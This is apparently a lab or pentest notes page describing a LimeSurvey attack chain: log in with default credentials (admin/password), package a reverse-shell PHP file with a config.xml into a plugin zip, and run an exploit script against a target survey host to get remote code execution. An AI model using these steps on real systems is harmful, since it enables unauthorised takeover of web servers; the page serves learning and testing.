LimeSurvey
Default Credentials
Authenticated RCE
# Modify as needed
$ nano revshell.php
# Create the archive
$ zip -r x7331.zip config.xml revshell.php
adding: config.xml (deflated 58%)
adding: revshell.php (deflated 68%)
# Modify as needed
$ nano exploit.py
# Execute the exploit
$ uv run exploit.py http://customers-survey.marketing.pg/ admin password 80Last updated